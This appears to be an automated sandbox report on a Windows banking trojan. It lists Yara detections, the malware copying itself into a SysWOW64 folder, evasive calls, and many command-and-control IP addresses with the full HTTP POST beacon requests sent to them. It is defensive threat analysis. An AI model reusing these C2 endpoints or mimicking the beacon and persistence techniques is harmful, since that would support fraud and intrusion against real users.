                    Source: global trafficHTTP traffic detected: POST /i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 186.70.127.199/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------wFchgTxoaJDVhqcHost: 186.70.127.199:8090Content-Length: 4644Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 1.226.84.243/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------w2uEKzXy195rM91Host: 1.226.84.243:8080Content-Length: 4644Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /RzqG/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 12.162.84.2/RzqG/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------bavvEoDqHost: 12.162.84.2:8080Content-Length: 4644Cache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 177.23.7.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.85.33.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.232.229.54
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.101.58.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 70.32.115.157
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 111.67.12.221
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 98.13.75.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.35.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 74.58.215.226
                    Source: unknownHTTP traffic detected: POST /3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------c1rFprRPYfa1Host: 177.23.7.151Content-Length: 4676Cache-Control: no-cache
                    Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/070VvHPjARxs33T/WdATQgVfQYq/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/GJ
                    Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/V
                    Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/w
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/$
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://12.162.84.2:8080/RzqG/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://12.162.84.2:8080/RzqG/2Z
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://12.162.84.2:8080/RzqG/7
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://12.162.84.2:8080/RzqG/hU
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://12.162.84.2:8080/RzqG/wshqos.dll.mui
                    Source: wpbcreds.exe, 00000001.00000002.3288758119.0000000002EC6000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/)
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/A
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/:n
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/Z
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/s
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRG
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/2
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/ngsLMEM8
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//M
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//Y
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/5
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/t
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/
                    Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/32
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/5
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/Z

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 75A0VTo3z9.exe, type: SAMPLE
                    Source: Yara matchFile source: 1.2.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeFile created: C:\Windows\SysWOW64\fwcfg\Jump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeFile deleted: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B82100_2_000B8210
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B7E500_2_000B7E50
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B3D100_2_000B3D10
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B3B100_2_000B3B10
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B76200_2_000B7620
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B3D370_2_000B3D37
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B63400_2_000B6340
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B39B00_2_000B39B0
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B1BE00_2_000B1BE0
                    Source: 75A0VTo3z9.exeStatic PE information: No import functions for PE file found
                    Source: 75A0VTo3z9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@0/84
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: CloseServiceHandle,CreateServiceW,_snwprintf,OpenSCManagerW,CloseServiceHandle,0_2_000B87E0
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B4E60 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,OpenServiceW,GetProcessHeap,HeapFree,0_2_000B4E60
                    Source: 75A0VTo3z9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 75A0VTo3z9.exeReversingLabs: Detection: 76%
                    Source: unknownProcess created: C:\Users\user\Desktop\75A0VTo3z9.exe "C:\Users\user\Desktop\75A0VTo3z9.exe"
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeProcess created: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe "C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeProcess created: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe "C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: 75A0VTo3z9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 75A0VTo3z9.exeStatic PE information: real checksum: 0x2c41d should be: 0x246dc
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5B00 push ecx; mov dword ptr [esp], 0000A2E6h0_2_000B5B01
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5B30 push ecx; mov dword ptr [esp], 0000FA5Dh0_2_000B5B31
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5C40 push ecx; mov dword ptr [esp], 0000BED0h0_2_000B5C41
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5D60 push ecx; mov dword ptr [esp], 000022A3h0_2_000B5D61
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5B70 push ecx; mov dword ptr [esp], 0000C5A7h0_2_000B5B71
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5C70 push ecx; mov dword ptr [esp], 0000ADB2h0_2_000B5C71
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5D80 push ecx; mov dword ptr [esp], 00000DA6h0_2_000B5D81
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5DC0 push ecx; mov dword ptr [esp], 00004963h0_2_000B5DC1
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5BC0 push ecx; mov dword ptr [esp], 000063CCh0_2_000B5BC1
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5CD0 push ecx; mov dword ptr [esp], 0000374Ah0_2_000B5CD1
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B5BF0 push ecx; mov dword ptr [esp], 0000B897h0_2_000B5BF1

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeExecutable created and started: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exePE file moved: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeFile opened: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 8090

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-5712
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,OpenServiceW,GetProcessHeap,HeapFree,0_2_000B4E60
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B36A0 FindNextFileW,FindNextFileW,FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,0_2_000B36A0
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2207886899.000000000344E000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW01B
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B4C10 mov eax, dword ptr fs:[00000030h]0_2_000B4C10
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B3D10 mov eax, dword ptr fs:[00000030h]0_2_000B3D10
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B6F10 LoadLibraryW,LoadLibraryW,GetProcessHeap,HeapFree,0_2_000B6F10
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exeQueries volume information: C:\ VolumeInformationJump to behavior
